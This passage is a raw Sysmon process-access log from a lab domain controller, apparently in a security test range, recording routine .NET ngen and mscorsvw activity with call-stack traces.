14:58:37.904{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-920E-00000000BB01}3096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.904{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-920E-00000000BB01}3096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.857{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-910E-00000000BB01}6672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.857{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-910E-00000000BB01}6672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.857{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-910E-00000000BB01}6672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.810{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-900E-00000000BB01}1532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.794{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-900E-00000000BB01}1532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.794{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-900E-00000000BB01}1532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.763{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-8F0E-00000000BB01}6236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.763{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-8F0E-00000000BB01}6236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.763{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-8F0E-00000000BB01}6236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.716{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-8E0E-00000000BB01}5864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.716{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-8E0E-00000000BB01}5864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.716{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-8E0E-00000000BB01}5864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.685{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-8D0E-00000000BB01}1460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.669{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-8D0E-00000000BB01}1460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.669{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-8D0E-00000000BB01}1460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.638{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-8C0E-00000000BB01}4048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.638{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-8C0E-00000000BB01}4048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.638{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-8C0E-00000000BB01}4048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.575{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-8B0E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.560{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-8B0E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.560{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-8B0E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 